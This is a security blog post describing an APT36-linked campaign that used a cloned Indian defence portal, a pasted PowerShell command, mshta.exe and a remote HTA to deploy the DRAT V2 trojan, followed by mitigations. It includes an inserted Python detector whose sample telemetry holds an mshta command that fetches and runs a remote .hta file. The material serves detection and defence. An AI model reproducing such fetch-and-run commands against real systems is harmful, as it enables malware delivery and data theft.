
The Newest APT36 blockbuster: Tanks, Trains, Rigs, and Diplomats

  • Javier Conejo del Cerro
  • 7 Jul
  • 3 min read

India’s defense and government sectors have become the setting of a new cyber-espionage thriller orchestrated by TAG-140, a threat actor tied to the Pakistan-aligned APT36 (SideCopy). This latest campaign showcases the deployment of DRAT V2, a sophisticated remote access trojan tailored for Windows environments.

The lure: a convincing clone of the Indian Ministry of Defence’s press release portal. By disguising their malicious infrastructure as a trusted government domain, the attackers managed to turn simple user interaction—copying and pasting a command—into a full-scale breach. Their targets span critical industries including military, railways, energy, and foreign affairs, suggesting a coordinated intelligence-gathering operation with geopolitical implications.


Unwitting stuntpeople


The individuals targeted by this campaign were not random victims, but high-value users whose daily routines brought them into contact with sensitive information and internal infrastructure.


Among them were:


  • Government employees with access to official communications and classified briefings.

  • Defense personnel responsible for logistics, planning, and secure messaging.

  • Users linked to ministries of foreign affairs, oil and gas, and transportation, with insight into strategic resources and diplomatic initiatives.


Their recurring need to consult press updates, internal bulletins, and restricted policy documents made them especially vulnerable to well-crafted impersonation attacks. What appeared to be routine administrative access was in fact the entry point for full-system compromise.


Flames and jumps


The breach began with a cloned version of the Ministry of Defence press portal, visually indistinguishable from the legitimate one. Users visiting the fake page encountered what appeared to be a download button or instruction panel. Instead of delivering a document, the button copied a malicious PowerShell command to the user’s clipboard.

The trap was sprung once the victim pasted and executed the command in their terminal. This triggered the execution of mshta.exe, a legitimate Windows tool that was abused to retrieve and run a remote HTA (HTML Application) file from trade4wealth[.]in—a domain under attacker control.


The malicious HTA script did three things:


  1. Displayed a decoy PDF to distract the user and simulate legitimate behavior.

  2. Modified registry keys to establish persistence on the compromised device.

  3. Deployed DRAT V2, a remote access trojan designed to steal and monitor sensitive information.


Once active, DRAT V2 exfiltrated:


  • Keystrokes to capture passwords and communication content.

  • Clipboard data, which could contain copied credentials or internal messages.

  • Browser credentials saved in Chrome or other browsers.

  • System metadata, including usernames, hostnames, OS versions, and installed applications.

  • Local files, targeting documents and logs relevant to the user’s role or department.


All stolen data was transmitted to the attackers through encrypted command-and-control (C2) channels, allowing them to maintain access, monitor behavior, and extract valuable intelligence over extended periods.


And cut!


Mitigating this attack requires coordinated action across users, IT administrators, and public institutions. Each layer of defense must address the specific failure points exploited in this campaign.


Stuntpeople (Users):


  • Avoid pasting commands copied from websites, even when the site appears to be a government or institutional portal.

  • Block the execution of .hta files through Group Policy or endpoint protection tools.

  • Report any unexpected file downloads or PDF popups from official-looking sites.


Studios (Admins):


  • Implement application allowlisting to prevent unauthorized scripts or executables from running.

  • Deploy DNS filtering to block outbound connections to suspicious or known malicious domains.

  • Enforce network segmentation to contain infections and prevent lateral movement across systems.

  • Monitor for use of living-off-the-land binaries (LOLBins) such as mshta.exe, especially when invoked by user processes.
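
The infection chain described above (a pasted command that launches mshta.exe to fetch a remote HTA) leaves a distinctive trace in process-creation telemetry, which is what the monitoring item above asks defenders to watch for. The following is an added example, not code from the original post or from any vendor: it scans Sysmon-style Event ID 1 records (serialised here as JSON lines, with the field names Sysmon uses) and flags mshta.exe launches that carry a URL or .hta payload on the command line, noting when the parent is an interactive user process such as PowerShell or Explorer. The sample events, hostnames, usernames and the example.invalid URL are all constructed for the demonstration.

```python
"""Flag suspicious mshta.exe launches in process-creation telemetry.

Added example (not from the original post). Input lines are constructed
Sysmon-style Event ID 1 records serialised as JSON; the field names
(Image, ParentImage, CommandLine, User, Computer) follow Sysmon's naming.
Hostnames, usernames and the example.invalid URL are placeholders.
"""
import json
import re
from dataclasses import dataclass
from typing import List, Optional

# Parents that indicate an interactive user action (a shell the user pasted
# into, or the desktop) rather than an installer or system-initiated launch.
USER_FACING_PARENTS = {"explorer.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}

# A URL or an .hta path on the mshta command line is the tell: the post's
# chain had mshta retrieve and run a remote HTML Application.
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
HTA_FILE = re.compile(r"\S+\.hta\b", re.IGNORECASE)


@dataclass
class Alert:
    host: str
    user: str
    parent: str
    command_line: str
    reasons: List[str]


def basename(path: str) -> str:
    """Return the lowercase file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: dict) -> Optional[Alert]:
    """Assess one process-creation event; return an Alert or None."""
    if basename(event.get("Image", "")) != "mshta.exe":
        return None
    cmd = event.get("CommandLine", "")
    parent = basename(event.get("ParentImage", ""))
    reasons = []
    if REMOTE_URL.search(cmd):
        reasons.append("remote URL on mshta command line")
    if HTA_FILE.search(cmd):
        reasons.append("explicit .hta payload")
    # mshta with no payload argument just opens an empty window; only the
    # parent-process observation is added once a payload indicator exists.
    if not reasons:
        return None
    if parent in USER_FACING_PARENTS:
        reasons.append(f"launched from user process {parent}")
    return Alert(event.get("Computer", "?"), event.get("User", "?"),
                 parent, cmd, reasons)


def scan(lines) -> List[Alert]:
    """Run evaluate() over JSON lines, skipping blank or malformed records."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed telemetry should not crash the pipeline
        alert = evaluate(event)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    # The pattern from the post: a pasted command in PowerShell spawns mshta
    # with a remote .hta URL. Three indicators fire.
    json.dumps({"Computer": "WS-01.example.invalid", "User": "CORP\\analyst",
                "Image": "C:\\Windows\\System32\\mshta.exe",
                "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "CommandLine": "mshta.exe https://example.invalid/press/release.hta"}),
    # A local .hta started by an installer: one indicator, lower priority.
    json.dumps({"Computer": "WS-02.example.invalid", "User": "CORP\\svc_deploy",
                "Image": "C:\\Windows\\System32\\mshta.exe",
                "ParentImage": "C:\\Windows\\System32\\msiexec.exe",
                "CommandLine": "mshta.exe \"C:\\Program Files\\Vendor\\setup.hta\""}),
    # mshta launched bare from Explorer: no payload, no alert.
    json.dumps({"Computer": "WS-03.example.invalid", "User": "CORP\\user",
                "Image": "C:\\Windows\\System32\\mshta.exe",
                "ParentImage": "C:\\Windows\\explorer.exe",
                "CommandLine": "mshta.exe"}),
    # Unrelated process: ignored.
    json.dumps({"Computer": "WS-03.example.invalid", "User": "CORP\\user",
                "Image": "C:\\Windows\\System32\\notepad.exe",
                "ParentImage": "C:\\Windows\\explorer.exe",
                "CommandLine": "notepad.exe notes.txt"}),
    "{not valid json",
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a.host} {a.user} parent={a.parent}: {'; '.join(a.reasons)}")
```

The parent-process check is kept separate from the payload check on purpose: a URL or .hta argument is what makes the launch worth an alert at all, while an interactive parent such as powershell.exe or explorer.exe raises its priority, because that is exactly the shape a pasted clipboard command produces. Installer-driven .hta launches still surface, but with a single reason, so they can be triaged or allowlisted without muting the rule.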


Production companies (Public Entities):


  • Enforce a Zero Trust model, requiring continuous verification for all internal and external access attempts.

  • Deploy Endpoint Detection and Response (EDR) tools that can detect and stop threats like DRAT V2 based on behavioral and signature-based indicators.

  • Isolate public-facing services from critical internal infrastructure, ensuring that even successful impersonation attacks don’t expose privileged systems.


